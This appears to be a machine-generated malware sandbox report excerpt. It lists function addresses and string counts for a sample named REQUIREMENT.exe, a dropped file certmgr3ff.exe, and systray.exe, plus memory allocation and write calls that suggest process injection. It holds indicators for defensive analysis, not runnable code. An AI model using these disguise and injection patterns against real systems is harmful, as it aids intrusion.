Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02412045	23_2_02412045
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024176AD	23_2_024176AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241BBCC	23_2_0241BBCC
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416041	23_2_02416041
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416841	23_2_02416841
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241684C	23_2_0241684C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02419A51	23_2_02419A51
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416251	23_2_02416251
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416059	23_2_02416059
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241625D	23_2_0241625D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A5D	23_2_02416A5D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241A25C	23_2_0241A25C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416065	23_2_02416065
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416269	23_2_02416269
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A69	23_2_02416A69
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241646D	23_2_0241646D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416071	23_2_02416071
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A75	23_2_02416A75
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416479	23_2_02416479
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416805	23_2_02416805
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02417A08	23_2_02417A08
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241681D	23_2_0241681D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416029	23_2_02416029
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416829	23_2_02416829
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415E2B	23_2_02415E2B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416035	23_2_02416035
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416835	23_2_02416835
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415EC3	23_2_02415EC3
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415ECD	23_2_02415ECD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415ED9	23_2_02415ED9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415EE5	23_2_02415EE5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241AAF9	23_2_0241AAF9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415EFD	23_2_02415EFD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416281	23_2_02416281
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416485	23_2_02416485
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241628D	23_2_0241628D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A8D	23_2_02416A8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416491	23_2_02416491
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415A93	23_2_02415A93
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A99	23_2_02416A99
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241649D	23_2_0241649D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416AA5	23_2_02416AA5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024158A9	23_2_024158A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024164A9	23_2_024164A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241A8BF	23_2_0241A8BF
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416941	23_2_02416941
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416745	23_2_02416745
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241694D	23_2_0241694D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416751	23_2_02416751
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416155	23_2_02416155
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416959	23_2_02416959
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241635B	23_2_0241635B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241675D	23_2_0241675D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416365	23_2_02416365
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416769	23_2_02416769
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241616D	23_2_0241616D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416179	23_2_02416179
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241637D	23_2_0241637D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415F11	23_2_02415F11
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415F15	23_2_02415F15
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416929	23_2_02416929
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416935	23_2_02416935
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241673B	23_2_0241673B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241613D	23_2_0241613D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024173C1	23_2_024173C1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416BC5	23_2_02416BC5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165C9	23_2_024165C9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416BD1	23_2_02416BD1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165D5	23_2_024165D5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416BDD	23_2_02416BDD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165E1	23_2_024165E1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416BF5	23_2_02416BF5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416185	23_2_02416185
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416389	23_2_02416389
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02419D8D	23_2_02419D8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416395	23_2_02416395
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165B1	23_2_024165B1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165BD	23_2_024165BD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02292045	24_2_02292045
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022976AD	24_2_022976AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229BBCC	24_2_0229BBCC
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296029	24_2_02296029
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296829	24_2_02296829
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295E2B	24_2_02295E2B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296035	24_2_02296035
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296835	24_2_02296835
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02297A08	24_2_02297A08
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296805	24_2_02296805
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229681D	24_2_0229681D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296269	24_2_02296269
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A69	24_2_02296A69
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229646D	24_2_0229646D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296065	24_2_02296065
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296479	24_2_02296479
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296071	24_2_02296071
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A75	24_2_02296A75
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229684C	24_2_0229684C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296041	24_2_02296041
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296841	24_2_02296841
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296059	24_2_02296059
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229625D	24_2_0229625D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A5D	24_2_02296A5D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229A25C	24_2_0229A25C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02299A51	24_2_02299A51
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296251	24_2_02296251
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022958A9	24_2_022958A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022964A9	24_2_022964A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296AA5	24_2_02296AA5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229A8BF	24_2_0229A8BF
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229628D	24_2_0229628D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A8D	24_2_02296A8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296281	24_2_02296281
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296485	24_2_02296485
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A99	24_2_02296A99
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229649D	24_2_0229649D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296491	24_2_02296491
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295A93	24_2_02295A93
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295EE5	24_2_02295EE5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229AAF9	24_2_0229AAF9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295EFD	24_2_02295EFD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295ECD	24_2_02295ECD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295EC3	24_2_02295EC3
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295ED9	24_2_02295ED9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296929	24_2_02296929
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229673B	24_2_0229673B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229613D	24_2_0229613D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296935	24_2_02296935
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295F11	24_2_02295F11
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295F15	24_2_02295F15
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296769	24_2_02296769
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229616D	24_2_0229616D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296365	24_2_02296365
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296179	24_2_02296179
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229637D	24_2_0229637D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229694D	24_2_0229694D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296941	24_2_02296941
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296745	24_2_02296745
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296959	24_2_02296959
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229635B	24_2_0229635B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229675D	24_2_0229675D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296751	24_2_02296751
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296155	24_2_02296155
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965BD	24_2_022965BD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965B1	24_2_022965B1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296389	24_2_02296389
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02299D8D	24_2_02299D8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296185	24_2_02296185
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296395	24_2_02296395
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965E1	24_2_022965E1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BF5	24_2_02296BF5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965C9	24_2_022965C9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022973C1	24_2_022973C1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BC5	24_2_02296BC5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BDD	24_2_02296BDD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BD1	24_2_02296BD1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965D5	24_2_022965D5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C2045	25_2_022C2045
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C76AD	25_2_022C76AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CBBCC	25_2_022CBBCC
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6029	25_2_022C6029
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6829	25_2_022C6829
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5E2B	25_2_022C5E2B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6035	25_2_022C6035
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6835	25_2_022C6835
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C7A08	25_2_022C7A08
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6805	25_2_022C6805
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C681D	25_2_022C681D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C646D	25_2_022C646D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6269	25_2_022C6269
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A69	25_2_022C6A69
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6065	25_2_022C6065
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6479	25_2_022C6479
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A75	25_2_022C6A75
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6071	25_2_022C6071
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C684C	25_2_022C684C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6041	25_2_022C6041
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6841	25_2_022C6841
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CA25C	25_2_022CA25C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C625D	25_2_022C625D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A5D	25_2_022C6A5D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6059	25_2_022C6059
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C9A51	25_2_022C9A51
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6251	25_2_022C6251
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C58A9	25_2_022C58A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C64A9	25_2_022C64A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6AA5	25_2_022C6AA5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CA8BF	25_2_022CA8BF
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C628D	25_2_022C628D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A8D	25_2_022C6A8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6485	25_2_022C6485
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6281	25_2_022C6281
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C649D	25_2_022C649D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A99	25_2_022C6A99
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6491	25_2_022C6491
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5A93	25_2_022C5A93
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5EE5	25_2_022C5EE5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5EFD	25_2_022C5EFD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CAAF9	25_2_022CAAF9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5ECD	25_2_022C5ECD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5EC3	25_2_022C5EC3
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5ED9	25_2_022C5ED9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6929	25_2_022C6929
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C613D	25_2_022C613D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C673B	25_2_022C673B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6935	25_2_022C6935
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5F15	25_2_022C5F15
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5F11	25_2_022C5F11
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C616D	25_2_022C616D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6769	25_2_022C6769
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6365	25_2_022C6365
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C637D	25_2_022C637D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6179	25_2_022C6179
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C694D	25_2_022C694D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6745	25_2_022C6745
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6941	25_2_022C6941
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C675D	25_2_022C675D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6959	25_2_022C6959
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C635B	25_2_022C635B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6155	25_2_022C6155
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6751	25_2_022C6751
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65BD	25_2_022C65BD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65B1	25_2_022C65B1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C9D8D	25_2_022C9D8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6389	25_2_022C6389
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6185	25_2_022C6185

Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9D7C40 appears 52 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9D5050 appears 36 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1EA1EF10 appears 105 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9924D0 appears 38 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9FE692 appears 172 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9E7BE4 appears 96 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E97B910 appears 502 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1EA0EF10 appears 210 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9D7BE4 appears 192 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9C5050 appears 72 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E98B910 appears 251 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1EA0E692 appears 86 times
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: String function: 1E9D5050 appears 37 times
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: String function: 1EA1EF10 appears 105 times
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: String function: 1E9E7BE4 appears 99 times
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: String function: 1E98B910 appears 255 times
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: String function: 1EA0E692 appears 86 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04A1EF10 appears 105 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 049D5050 appears 37 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 0498B910 appears 257 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04A0E692 appears 83 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 049E7BE4 appears 98 times

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B76AD NtAllocateVirtualMemory,	1_2_023B76AD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BB688 NtProtectVirtualMemory,	1_2_023BB688
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6035 NtWriteVirtualMemory,	1_2_023B6035
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6835 NtWriteVirtualMemory,	1_2_023B6835
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6029 NtWriteVirtualMemory,	1_2_023B6029
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6829 NtWriteVirtualMemory,	1_2_023B6829
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B681D NtWriteVirtualMemory,	1_2_023B681D
